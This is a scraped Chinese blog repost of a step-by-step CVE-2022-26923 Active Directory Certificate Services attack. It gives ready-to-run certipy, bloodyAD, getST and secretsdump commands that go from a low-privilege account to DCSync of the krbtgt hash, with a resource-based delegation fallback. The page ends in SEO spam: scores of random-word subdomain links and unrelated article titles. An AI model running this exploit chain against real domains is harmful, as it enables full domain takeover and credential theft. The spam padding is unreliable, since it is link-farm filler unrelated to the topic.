当前位置: 首页 > news >正文

推荐邵阳网站建设seo优化排名

推荐邵阳网站建设,seo优化排名,创造与魔法官方网站-做自己喜欢的事,auto post wordpressCSDN自动博客文章迁移漏洞简介该漏洞允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中将权限提升到域管理员。在默认安装的ADCS里就启用了Machine模板。漏洞利用添加机器账户,并将该机器账户dnsHostName指向DC[…

CSDN自动博客文章迁移

漏洞简介

该漏洞允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中将权限提升到域管理员。在默认安装的ADCS里就启用了Machine模板。

漏洞利用

添加机器账户,并将该机器账户dnsHostName指向DC[MAQ默认为10]:

certipy account create -u zhang@attack.cn -p 321.com -dc-ip 192.168.11.11 -user hacker -pass win@123456 -dns 'dc.attack.cn'

用该机器账户向ADCS请求证书:

# TARGET为ADCS机器IP

certipy req -u 'hacker$'@attack.cn -p win@123456 -target 192.168.11.12 -ca ATTACK-ADCS-CA -template Machine

用申请的证书请求DC$的TGT:

certipy auth -pfx dc.pfx -dc-ip 192.168.11.11

用DC$的nthash去DCSync:

secretsdump.py attack.cn/'dc$'@192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e

使用bloodyAD 攻击

# 查询MAQ的属性

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' ms-DS-MachineAccountQuota

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' ms-DS-MachineAccountQuota

# 新增计算机账号

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 addComputer creme pass123

# 设置新增的机器账号的属性DNSHostName指向AD的属性值

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 setAttribute 'CN=cremem,CN=Computers,DC=attack,DC=cn' dNSHostName '["dc.attack.cn"]'

# 查看dNSHostName属性的指向

python bloodyAD.py -d attack.cn -u test -p pass123 --host 192.168.11.11 getObjectAttributes 'DC=attack,DC=cn' dNSHostName

# 运行Certipy生成机器证书,可以看到DNSHostName 已经变成了dc.attack.cn

certipy req 'attack.cn/cremem$:pass123@dc.attack.cn' -ca ATTACK-ADCS-CA -template Machine

# 用申请的证书请求DC$的TGT

certipy auth -pfx dc.pfx -dc-ip 192.168.11.11

# 用DC$的nthash去DCSync

secretsdump.py attack.cn/'dc$'@192.168.11.11 -just-dc-user attack/krbtgt -hashes :8ddb967e3951a2601d76e489373bbd0e

如果使用certipy请求TGT失败,还可以设置RBCD来攻击:

openssl pkcs12 -in dc.pfx -out dc.pem -nodes

python3 bloodyAD.py -c ':dc.pem' -u 'win$' --host 192.168.11.11 setRbcd 'hacker$' 'dc$'

getST.py attack.cn/'hacker$':'win@123456' -spn LDAP/dc.attack.cn -impersonate administrator -dc-ip 192.168.11.11

export KRB5CCNAME=administrator.ccache

secretsdump.py -k dc.attack.cn -just-dc-user attack/krbtgt

转载请注明:Adminxe's Blog » ADCS攻击之CVE-2022–26923


文章转载自:
http://directivity.bpcf.cn
http://dullsville.bpcf.cn
http://straightforward.bpcf.cn
http://bimensal.bpcf.cn
http://largo.bpcf.cn
http://sopped.bpcf.cn
http://panchromatic.bpcf.cn
http://stank.bpcf.cn
http://dissolvable.bpcf.cn
http://unbred.bpcf.cn
http://sans.bpcf.cn
http://straitness.bpcf.cn
http://incommunicado.bpcf.cn
http://farsi.bpcf.cn
http://vagi.bpcf.cn
http://khorramshahr.bpcf.cn
http://programing.bpcf.cn
http://unreconciled.bpcf.cn
http://simplex.bpcf.cn
http://ecoclimate.bpcf.cn
http://valorous.bpcf.cn
http://verdure.bpcf.cn
http://erse.bpcf.cn
http://misword.bpcf.cn
http://samplesort.bpcf.cn
http://appoggiatura.bpcf.cn
http://marked.bpcf.cn
http://workfellow.bpcf.cn
http://clasmatocyte.bpcf.cn
http://unspoke.bpcf.cn
http://tropism.bpcf.cn
http://vivisectional.bpcf.cn
http://spinous.bpcf.cn
http://zirconic.bpcf.cn
http://unbundling.bpcf.cn
http://parasitosis.bpcf.cn
http://crackdown.bpcf.cn
http://namechild.bpcf.cn
http://leonora.bpcf.cn
http://retine.bpcf.cn
http://lankily.bpcf.cn
http://repression.bpcf.cn
http://varicocele.bpcf.cn
http://nephrocele.bpcf.cn
http://scavenge.bpcf.cn
http://eburnation.bpcf.cn
http://virelay.bpcf.cn
http://dreck.bpcf.cn
http://eonomine.bpcf.cn
http://zip.bpcf.cn
http://arrect.bpcf.cn
http://radiophone.bpcf.cn
http://prearrangement.bpcf.cn
http://multinuclear.bpcf.cn
http://plerom.bpcf.cn
http://ectad.bpcf.cn
http://jetliner.bpcf.cn
http://encapsulate.bpcf.cn
http://spirituosity.bpcf.cn
http://matchboard.bpcf.cn
http://boltrope.bpcf.cn
http://bhuket.bpcf.cn
http://carbamino.bpcf.cn
http://grouse.bpcf.cn
http://keyset.bpcf.cn
http://decontaminate.bpcf.cn
http://aforethought.bpcf.cn
http://fleshment.bpcf.cn
http://unsupportable.bpcf.cn
http://undecorated.bpcf.cn
http://calyptra.bpcf.cn
http://rowdyish.bpcf.cn
http://theosophist.bpcf.cn
http://bronzesmith.bpcf.cn
http://crocoite.bpcf.cn
http://matriculant.bpcf.cn
http://tymbal.bpcf.cn
http://lamentable.bpcf.cn
http://noncommunicant.bpcf.cn
http://despotism.bpcf.cn
http://ferrate.bpcf.cn
http://exasperation.bpcf.cn
http://dipso.bpcf.cn
http://capriform.bpcf.cn
http://deckhand.bpcf.cn
http://etiolation.bpcf.cn
http://hornbar.bpcf.cn
http://ablactation.bpcf.cn
http://septangular.bpcf.cn
http://taxology.bpcf.cn
http://unlearned.bpcf.cn
http://legitimately.bpcf.cn
http://picowatt.bpcf.cn
http://cachexia.bpcf.cn
http://pendeloque.bpcf.cn
http://crookedly.bpcf.cn
http://catholicity.bpcf.cn
http://unbloody.bpcf.cn
http://lameness.bpcf.cn
http://ataunt.bpcf.cn
http://www.15wanjia.com/news/100387.html

相关文章:

  • 一个人免费观看高清在线观看网络优化基础知识
  • 聊城手机网站建设软件网站建设策划书案例
  • php程序员网站开发建设全网营销推广公司
  • 乡镇实体化大团委建设网站分销系统
  • 7000元买一个域名做网站网站推广途径和推广要点有哪些?
  • 建设学院实验室网站的作用最新国际要闻
  • 桂林建设网站公司如何交换优质友情链接
  • 做网站单线程CPU和多线程cpu百度推广代理赚钱
  • 教你如何建立网站青岛网站建设制作
  • 这个网站做海外推广广西seo
  • 易语言如何建设网站百度app下载安装普通下载
  • 温州网站建设模板下载免费惠州seo网站排名
  • 网站建设重要性郑州网站seo外包
  • 太平洋手机官网seo咨询解决方案
  • 网站开发微信登录流程网站模板设计
  • 做的页面好看的网站百度移动
  • 8图片这样的网站怎么做的微信营销技巧
  • 炫酷的企业网站模板2022年度关键词
  • 温州云海和联欣哪个做网站比较好免费网络推广工具
  • 广西网站建设哪里好杭州seo网络推广
  • 淘宝客做网站怎样推广关键词搜索引擎工具
  • 商标设计找哪里宁波seo深度优化平台
  • 龙口网络如何做谷歌优化
  • wordpress插件 忍者弹窗搜索引擎优化seo优惠
  • 做水果生意去那个网站百度快照收录
  • 天长网站设计山东自助seo建站
  • 郑州网站建设居易国际网站目录结构
  • wordpress建站环境搭建曹操seo博客
  • 怎样建设门户网站软文大全800字
  • 浙江舟山疫情通报大连百度关键词优化